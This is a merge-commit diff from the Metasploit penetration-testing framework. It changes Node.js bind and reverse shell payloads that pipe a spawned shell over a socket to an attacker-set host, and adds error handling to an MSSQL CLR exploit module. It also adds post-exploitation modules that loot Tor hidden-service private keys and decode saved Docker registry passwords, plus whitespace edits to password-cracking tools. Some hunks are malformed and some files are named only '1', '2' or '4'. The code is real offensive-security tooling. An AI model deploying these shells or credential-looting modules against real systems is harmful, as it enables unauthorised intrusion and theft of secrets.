Merge branch 'master' of https://github.com/rapid7/metasploit-framework into add_smb1_scanner

2017-09-14 17:00:45 -05:00 · 2017-09-14 17:00:45 -05:00 · e88b766276
parent 646dda7958 9b5350ff9c
commit e88b766276
24 changed files with 242 additions and 76 deletions
--- a/lib/msf/core/payload/nodejs.rb
+++ b/lib/msf/core/payload/nodejs.rb
@ -18,8 +18,13 @@ module Msf::Payload::NodeJS
        var server = net.createServer(function(socket) {  
          var sh = cp.spawn(cmd, []);
          socket.pipe(sh.stdin);
-          util.pump(sh.stdout, socket);
+          if (typeof util.pump === "undefined") {
-          util.pump(sh.stderr, socket);
+            sh.stdout.pipe(client.socket);
            sh.stderr.pipe(client.socket);          
          } else {
            util.pump(sh.stdout, client.socket);
            util.pump(sh.stderr, client.socket);
          }
        });
        server.listen(#{datastore['LPORT']});
      })();
@ -53,8 +58,13 @@ module Msf::Payload::NodeJS
        var client = this;
        client.socket = net.connect(#{datastore['LPORT']}, "#{lhost}", #{tls_hash} function() {
          client.socket.pipe(sh.stdin);
-          util.pump(sh.stdout, client.socket);
+          if (typeof util.pump === "undefined") {
-          util.pump(sh.stderr, client.socket);
+            sh.stdout.pipe(client.socket);
            sh.stderr.pipe(client.socket);          
          } else {
            util.pump(sh.stdout, client.socket);
            util.pump(sh.stderr, client.socket);
          }
        });
      })();
    EOS
--- a/modules/exploits/windows/mssql/mssql_clr_payload.rb
+++ b/modules/exploits/windows/mssql/mssql_clr_payload.rb
@ -96,7 +96,13 @@ class MetasploitModule < Msf::Exploit::Remote
  end
  def set_trustworthy(on)
-      mssql_query("ALTER DATABASE [#{datastore['DATABASE']}] SET TRUSTWORTHY #{on ? 'ON' : 'OFF'}", false)
+    result = mssql_query("ALTER DATABASE [#{datastore['DATABASE']}] SET TRUSTWORTHY #{on ? 'ON' : 'OFF'}", false)
    unless result[:errors].empty?
      result[:errors].each do |err|
        vprint_error(err)
      end
      fail_with(Failure::Unknown, "Failed to change Trustworthy setting")
    end
  end
  def is_trustworthy
@ -112,7 +118,13 @@ RECONFIGURE;
 EXEC sp_configure 'clr enabled', #{enable ? 1 : 0};
 RECONFIGURE;
    ^
-    mssql_query(query, false)
+    result = mssql_query(query, false)
    unless result[:errors].empty?
      result[:errors].each do |err|
        vprint_error(err)
      end
      fail_with(Failure::Unknown, "Failed to change CLR setting")
    end
  end
  def is_clr_enabled
--- a/modules/nops/aarch64/simple.rb
+++ b/modules/nops/aarch64/simple.rb
@ -40,4 +40,5 @@ class MetasploitModule < Msf::Nop
    end
    return ([nops[0]].pack("V*") * (length/4))
  end
-end
+end
--- a/modules/payloads/singles/cmd/unix/bind_nodejs.rb
+++ b/modules/payloads/singles/cmd/unix/bind_nodejs.rb
@ -10,7 +10,7 @@ require 'msf/base/sessions/command_shell_options'
 module MetasploitModule
-  CachedSize = 1843
+  CachedSize = 2351
  include Msf::Payload::Single
  include Msf::Payload::NodeJS
--- a/modules/payloads/singles/cmd/unix/reverse_nodejs.rb
+++ b/modules/payloads/singles/cmd/unix/reverse_nodejs.rb
@ -10,7 +10,7 @@ require 'msf/base/sessions/command_shell_options'
 module MetasploitModule
-  CachedSize = 1971
+  CachedSize = 2423
  include Msf::Payload::Single
  include Msf::Payload::NodeJS
--- a/modules/payloads/singles/nodejs/shell_bind_tcp.rb
+++ b/modules/payloads/singles/nodejs/shell_bind_tcp.rb
@ -13,7 +13,7 @@ require 'msf/base/sessions/command_shell'
 module MetasploitModule
-  CachedSize = 456
+  CachedSize = 583
  include Msf::Payload::Single
  include Msf::Payload::NodeJS
--- a/modules/payloads/singles/nodejs/shell_reverse_tcp.rb
+++ b/modules/payloads/singles/nodejs/shell_reverse_tcp.rb
@ -13,7 +13,7 @@ require 'msf/base/sessions/command_shell'
 module MetasploitModule
-  CachedSize = 488
+  CachedSize = 601
  include Msf::Payload::Single
  include Msf::Payload::NodeJS
--- a/modules/payloads/singles/nodejs/shell_reverse_tcp_ssl.rb
+++ b/modules/payloads/singles/nodejs/shell_reverse_tcp_ssl.rb
@ -10,7 +10,7 @@ require 'msf/base/sessions/command_shell_options'
 module MetasploitModule
-  CachedSize = 516
+  CachedSize = 629
  include Msf::Payload::Single
  include Msf::Payload::NodeJS
--- a/modules/post/linux/gather/tor_hiddenservices.rb
+++ b/modules/post/linux/gather/tor_hiddenservices.rb
@ -0,0 +1,103 @@
 ##
 # This module requires Metasploit: http://metasploit.com/download
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
 # Adapted from post/linux/gather/enum_configs.rb
 ##
 class MetasploitModule < Msf::Post
  include Msf::Post::Linux::System
  include Msf::Post::Linux::Priv
  def initialize(info={})
    super( update_info( info,
      'Name'          => 'Linux Gather TOR Hidden Services',
      'Description'   => %q{
        This module collects the hostnames name and private keys of
        any TOR Hidden Services running on the target machine. It
        will search for torrc and if found, will parse it for the
        directories of Hidden Services. However, root permissions
        are required to read them as they are owned by the user that
        TOR runs as, usually a separate account.
      },
      'License'       => MSF_LICENSE,
      'Author'        =>
        [
          'Harvey Phillips <xcellerator[at]gmx.com>',
        ],
      'Platform'      => ['linux'],
      'SessionTypes'  => ['shell', 'meterpreter']
    ))
  end
  def run
    distro = get_sysinfo
    h = get_host
    print_status("Running module against #{h}")
    print_status("Info:")
    print_status("\t#{distro[:version]}")
    print_status("\t#{distro[:kernel]}")
    print_status("Looking for torrc...")
    find_torrc
  end
  def save(file, data, ltype, ctype="text/plain")
    fname = ::File.basename(file)
    loot = store_loot(ltype, ctype, session, data, fname)
    print_status("#{fname} stored in #{loot.to_s}")
  end
  def get_host
    case session.type
    when /meterpreter/
      host = sysinfo["Computer"]
    when /shell/
      host = cmd_exec("hostname").chomp
    end
    return host
  end
  def find_torrc
    config = cmd_exec("locate 'torrc' | grep -v 'torrc.5.gz'").split("\n")
    if config.length == 0
        print_error ("No torrc file found, maybe it goes by a different name?")
    else
        hidden = Array.new
        # For every torrc file found, parse them for HiddenServiceDir
        config.each do |c|
            print_good("Torrc file found at #{c}")
            services = cmd_exec("cat #{c} | grep HiddenServiceDir | grep -v '#' | cut -d ' ' -f 2").split("\n")
            # For each HiddenServiceDir found in the torrc(s), push them to the hidden array
            services.each do |s|
                hidden.push(s)
            end
     end
     # Remove any duplicate entries
     hidden = hidden.uniq
     # If hidden is empty, then no Hidden Services are running.
     if hidden.length != 0
         print_good("#{hidden.length} hidden services have been found!")
     else
         print_bad("No hidden services were found!")
     end
     if is_root?
         # For all the Hidden Services found, loot hostname file
         hidden.each do |f|
         output = read_file("#{f}hostname")
         save(f, output, "tor.#{f.split("/")[-1]}.hostname") if output && output !~ /No such file or directory/
         end
         # For all the Hidden Services found, loot private_key file
         hidden.each do |f|
            output = read_file("#{f}private_key")
            save(f, output, "tor.#{f.split("/")[-1]}.privatekey") if output && output !~ /No such file or directory/
         end
     else
         print_error("Hidden Services were found, but we need root to access the directories")
     end
    end
  end
 end
--- a/modules/post/multi/gather/docker_creds.rb
+++ b/modules/post/multi/gather/docker_creds.rb
@ -0,0 +1,93 @@
 ##
 # This module requires Metasploit: https://metasploit.com/download
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
 require 'json'
 class MetasploitModule < Msf::Post
  include Msf::Post::File
  include Msf::Post::Unix
  def initialize(info={})
    super( update_info(info,
      'Name'           => 'Multi Gather Docker Credentials Collection',
      'Description'    => %q{
          This module will collect the contents of all users' .docker directories on the targeted
          machine. If the user has already push to docker hub, chances are that the password was
          saved in base64 (default behavior).
      },
      'License'        => MSF_LICENSE,
      'Author'         => ['Flibustier'],
      'Platform'       => %w{ bsd linux osx unix },
      'SessionTypes'   => ['shell']
    ))
  end
  # This module is largely based on gpg_creds.rb.
  def run
    print_status("Finding .docker directories")
    paths = enum_user_directories.map {|d| d + "/.docker"}
    # Array#select! is only in 1.9
    paths = paths.select { |d| directory?(d) }
    if paths.nil? || paths.empty?
      print_error("No users found with a .docker directory")
      return
    end
    download_loot(paths)
  end
  def download_loot(paths)
    print_status("Looting #{paths.count} directories")
    paths.each do |path|
      path.chomp!
      file = "config.json"
      target = "#{path}/#{file}"
      if file? target
        print_status("Downloading #{target} -> #{file}")
        extract(target)
      end
    end
  end
  def extract(target)
    file = read_file(target)
    parsed = JSON.parse(file)
    if parsed["auths"]
      parsed["auths"].each do |key, value|
        vprint_status("key: #{key}")
        value.each do |k,v|
          if k == "auth"
            plain = Rex::Text.decode_base64(v)
            if plain.include? ":"
              print_good("Found #{plain}")
              username, password = plain.split(':')
              credential_data = {
                origin_type: :import,
              module_fullname: self.fullname,
              filename: target,
              workspace_id: myworkspace_id,
              service_name: 'docker',
              realm_value: key,
              realm_key: Metasploit::Model::Realm::Key::WILDCARD,
              private_type: :password,
              private_data: password,
              username: username
            }
            create_credential(credential_data)
            print_good("Saved credentials")
            end
          end
        end
      end
    else
      print_status("No credentials found in config file")
    end
  end
 end
--- a/modules/post/multi/gather/gpg_creds.rb
+++ b/modules/post/multi/gather/gpg_creds.rb
@ -29,7 +29,7 @@ class MetasploitModule < Msf::Post
    # Array#select! is only in 1.9
    paths = paths.select { |d| directory?(d) }
-    if paths.nil? or paths.empty?
+    if paths.nil? || paths.empty?
      print_error("No users found with a .gnupg directory")
      return
    end
@ -49,7 +49,7 @@ class MetasploitModule < Msf::Post
        if directory?(target)
          next
        end
-        print_status("Downloading #{path}#{sep}#{file} -> #{file}")
+        print_status("Downloading #{target} -> #{file}")
        data = read_file(target)
        file = file.split(sep).last
        type = file.gsub(/\.gpg.*/, "").gsub(/gpg\./, "")
--- a/2
+++ b/2
@ -19,8 +19,6 @@ end
 $:.unshift(File.expand_path(File.join(File.dirname(msfbase), 'lib')))
 require 'msfenv'
 $:.unshift(ENV['MSF_LOCAL_LIB']) if ENV['MSF_LOCAL_LIB']
 require 'msf/base'
--- a/4
+++ b/4
@ -17,8 +17,6 @@ end
 $:.unshift(File.expand_path(File.join(File.dirname(msfbase), 'lib')))
 require 'msfenv'
 $:.unshift(ENV['MSF_LOCAL_LIB']) if ENV['MSF_LOCAL_LIB']
 require 'rex/parser/arguments'
@ -59,7 +57,6 @@ arguments.parse(ARGV) do |opt, idx, val|
  end
 end
 unless opts['ServerHost']
  $stderr.puts "[-] Error: a server IP must be specified (-a)"
  $stderr.puts arguments.usage
@ -93,4 +90,3 @@ while(ARGV.shift)
 end
 Rex::Ui::Text::IrbShell.new(binding).run
--- a/2
+++ b/2
@ -17,8 +17,6 @@ end
 $:.unshift(File.expand_path(File.join(File.dirname(msfbase), 'lib')))
 require 'msfenv'
 $:.unshift(ENV['MSF_LOCAL_LIB']) if ENV['MSF_LOCAL_LIB']
 require 'rex/parser/arguments'
--- a/1
+++ b/1
@ -16,7 +16,6 @@ require 'msf/ui'
 require 'msf/base'
 require 'msf/core/payload_generator'
 class MsfVenomError < StandardError; end
 class HelpError < StandardError; end
 class UsageError < MsfVenomError; end
--- a/tools/password/cpassword_decrypt.rb
+++ b/tools/password/cpassword_decrypt.rb
@ -79,7 +79,6 @@ class CPassword
  end
 end
 #
 # Shows script usage
 #
@ -88,7 +87,6 @@ def usage
  exit
 end
 #
 # Prints a status message
 #
@ -96,7 +94,6 @@ def print_status(msg='')
  $stderr.puts "[*] #{msg}"
 end
 #
 # Prints an error message
 #
@ -104,7 +101,6 @@ def print_error(msg='')
  $stderr.puts "[-] #{msg}"
 end
 #
 # Prints a good message
 #
@ -112,7 +108,6 @@ def print_good(msg='')
  $stderr.puts "[+] #{msg}"
 end
 #
 # main
 #
--- a/tools/password/halflm_second.rb
+++ b/tools/password/halflm_second.rb
@ -39,7 +39,6 @@ $args = Rex::Parser::Arguments.new(
  "-s" => [ true,  "The server challenge (default value 1122334455667788)"            ],
  "-h" => [ false, "Display this help information"                                      ])
 $args.parse(ARGV) { |opt, idx, val|
  case opt
    when "-n"
@ -81,8 +80,6 @@ if(pass.length != 7)
  exit
 end
 pass = pass.upcase
 hash = hash.downcase
@ -123,7 +120,6 @@ end
 end
 end
 puts "[*] Trying four characters (eta: #{etime * cset.length * cset.length * cset.length} seconds)..."
 0.upto(cset.length-1) do |c1|
 0.upto(cset.length-1) do |c2|
--- a/tools/password/hmac_sha1_crack.rb
+++ b/tools/password/hmac_sha1_crack.rb
@ -2,7 +2,7 @@
 #
 # $Id$
 #
-# This script cracks HMAC SHA1 hashes. It is strangely necessary as existing tools 
+# This script cracks HMAC SHA1 hashes. It is strangely necessary as existing tools
 # have issues with binary salt values and extremely large salt values. The primary
 # goal of this tool is to handle IPMI 2.0 HMAC SHA1 hashes.
 #
@ -29,7 +29,6 @@ def usage
  exit
 end
 hash_inp  = ARGV.shift || usage()
 word_inp  = ARGV.shift || usage()
@ -51,17 +50,16 @@ hash_fd.each_line do |line|
    $stderr.puts "[-] Invalid hash entry, missing field: #{line}"
    next
  end
-  unless h_salt =~ /^[a-f0-9]+$/i 
+  unless h_salt =~ /^[a-f0-9]+$/i
    $stderr.puts "[-] Invalid hash entry, salt must be in hex: #{line}"
    next
  end
  hashes << [h_id, [h_salt].pack("H*"), [h_hash].pack("H*") ]
 end
-hash_fd.close 
+hash_fd.close
 stime = Time.now.to_f
-count = 0 
+count = 0
 cracked = 0
 word_fd.each_line do |line|
@ -75,10 +73,10 @@ word_fd.each_line do |line|
      cracked += 1
    end
    count += 1
-    
+
    if count % 2500000 == 0
      $stderr.puts "[*] Found #{cracked} passwords with #{hashes.length} left (#{(count / (Time.now.to_f - stime)).to_i}/s)"
-    end		
+    end
  end
  hashes.delete_if {|e| e[3] }
  break if hashes.length == 0
--- a/tools/password/lm2ntcrack.rb
+++ b/tools/password/lm2ntcrack.rb
@ -70,7 +70,6 @@ $args = Rex::Parser::Arguments.new(
  "-d" => [ true,  "The domain (machine) name    (NETLMv2/NETNTLMv2 type only)"     	],
  "-h" => [ false, "Display this help information"                                                   	])
 $args.parse(ARGV) { |opt, idx, val|
  case opt
    when "-t"
@ -122,7 +121,6 @@ else
  end
 end
 if type == "HALFLM" or type == "LM" or type == "NTLM" then
  if srvchal != nil or clichal != nil or user != nil or domain != nil  then
    $stderr.puts "[*] No challenge, user or domain must be provided with this type"
@ -872,5 +870,3 @@ else
  $stderr.puts "type must be of type : HALFLM/LM/NTLM/HALFNETLMv1/NETLMv1/NETNTLMv1/NETNTLM2_SESSION/NETLMv2/NETNTLMv2"
  exit
 end
--- a/tools/password/md5_lookup.rb
+++ b/tools/password/md5_lookup.rb
@ -37,7 +37,6 @@ require 'rex'
 require 'msf/core'
 require 'optparse'
 #
 # Basic prints we can't live without
 #
@ -71,7 +70,6 @@ module Md5LookupUtility
    #  @return [String] The name of the tool
    attr_accessor :group_name
    def initialize
      self.config_file = Msf::Config.config_file
      self.group_name  = 'MD5Lookup'
@ -93,7 +91,6 @@ module Md5LookupUtility
      end
    end
    # Saves the waiver so the warning won't show again after ack
    #
    # @return [void]
@ -101,7 +98,6 @@ module Md5LookupUtility
      save_setting('waiver', true)
    end
    # Returns true if we don't have to show the warning again
    #
    # @return [Boolean]
@ -109,7 +105,6 @@ module Md5LookupUtility
      load_setting('waiver') == 'true' ? true : false
    end
    private
    # Saves a setting to Metasploit's config file
@ -124,7 +119,6 @@ module Md5LookupUtility
      ini.to_file(self.config_file)
    end
    # Returns the value of a specific setting
    #
    # @param key_name [String] The name of the setting
@ -177,7 +171,6 @@ module Md5LookupUtility
      )
    end
    # Returns the found cracked MD5 hash
    #
    # @param md5_hash [String] The MD5 hash to lookup
@ -192,10 +185,8 @@ module Md5LookupUtility
      get_json_result(res)
    end
    private
    # Parses the cracked result from a JSON input
    # @param res [Rex::Proto::Http::Response] The Rex HTTP response
    # @return [String] Found cracked MD5 hash
@ -217,7 +208,6 @@ module Md5LookupUtility
  end
  # This class parses the user-supplied options (inputs)
  class OptsConsole
@ -275,10 +265,8 @@ module Md5LookupUtility
      options
    end
    private
    # Returns the parsed options from ARGV
    #
    # raise [OptionParser::InvalidOption] Invalid option found
@ -317,7 +305,6 @@ module Md5LookupUtility
      return parser, options
    end
    # Returns the actual database names based on what the user wants
    #
    # @param list [String] A list of user-supplied database names
@ -339,7 +326,6 @@ module Md5LookupUtility
      new_db_list
    end
    # Returns a list of all of the supported database symbols
    #
    # @return [Array<Symbol>] Database symbols
@ -357,7 +343,6 @@ module Md5LookupUtility
    end
  end
  # This class decides how this process works
  class Driver
@ -379,7 +364,6 @@ module Md5LookupUtility
      end
    end
    # Main function
    #
    # @return [void]
@ -403,7 +387,6 @@ module Md5LookupUtility
      end
    end
    # Cleans up the output file handler if exists
    #
    # @return [void]
@ -411,10 +394,8 @@ module Md5LookupUtility
      @output_handle.close if @output_handle
    end
    private
    # Saves the MD5 result to file
    #
    # @param result [Hash] The result that contains the MD5 information
@ -472,7 +453,6 @@ module Md5LookupUtility
 end
 #
 # main
 #
--- a/tools/password/vxencrypt.rb
+++ b/tools/password/vxencrypt.rb
@ -1,3 +1,5 @@
 #!/usr/bin/env ruby
 #
 # $Id$
 #
 # This script can be used to calculate hash values for VxWorks passwords.
@ -15,7 +17,6 @@ def hashit(inp)
  hackit(sum)
 end
 def hackit(sum)
  magic = 31695317
  res = ((sum * magic) & 0xffffffff).to_s
@ -29,4 +30,3 @@ end
 input = ARGV.shift || "flintstone"
 $stderr.puts "[*] Hash for password '#{input}' is #{hashit(input)}"
--- a/tools/password/vxmaster.rb
+++ b/tools/password/vxmaster.rb
@ -12,7 +12,6 @@
 # $Revision$
 #
 # VxWorks converts the clear-text password into single integer value. This value
 # can only be one of about 210,000 possible options. The method below emulates
 # what the vxencrypt utility does and was implemented based on publicly indexed
@ -128,7 +127,6 @@ seeds = []
 end
 seedsets << seeds
 seeds = []
 8.upto(12) do |slen|
  0x23.upto(0x7c) do |cset|
@ -165,7 +163,6 @@ seeds = []
 end
 seedsets << seeds
 # Calculate passwords and their hashes for all possible outputs
 1.upto(209656) do |i|
  found = false
@ -200,4 +197,3 @@ seedsets << seeds
    exit(0)
  end
 end
--- a/tools/recon/list_interfaces.rb
+++ b/tools/recon/list_interfaces.rb
@ -19,7 +19,6 @@ require 'msfenv'
 $:.unshift(ENV['MSF_LOCAL_LIB']) if ENV['MSF_LOCAL_LIB']
 if RUBY_PLATFORM == "i386-mingw32"
  begin
    require 'network_interface'
--- a/tools/recon/makeiplist.rb
+++ b/tools/recon/makeiplist.rb
@ -12,18 +12,17 @@
 # mubix
 #
 msfbase = __FILE__
 while File.symlink?(msfbase)
  msfbase = File.expand_path(File.readlink(msfbase), File.dirname(msfbase))
 end
 $:.unshift(File.expand_path(File.join(File.dirname(msfbase), '..', '..', 'lib')))
 require 'msfenv'
 require 'rex'
 require 'optparse'
 class OptsConsole
  def self.parse(args)
    options = {'output' => 'iplist.txt'}
@ -78,7 +77,6 @@ Usage: #{__FILE__} [options]|
  end
 end
 #
 # Prints IPs
 #
@ -91,7 +89,6 @@ def make_list(in_f, out_f)
    end
 end
 #
 # Returns file handles
 #
@ -106,7 +103,6 @@ def load_files(in_f, out_f)
  return handle_in, handle_out
 end
 options = OptsConsole.parse(ARGV)
 in_f, out_f = load_files(options['input'], options['output'])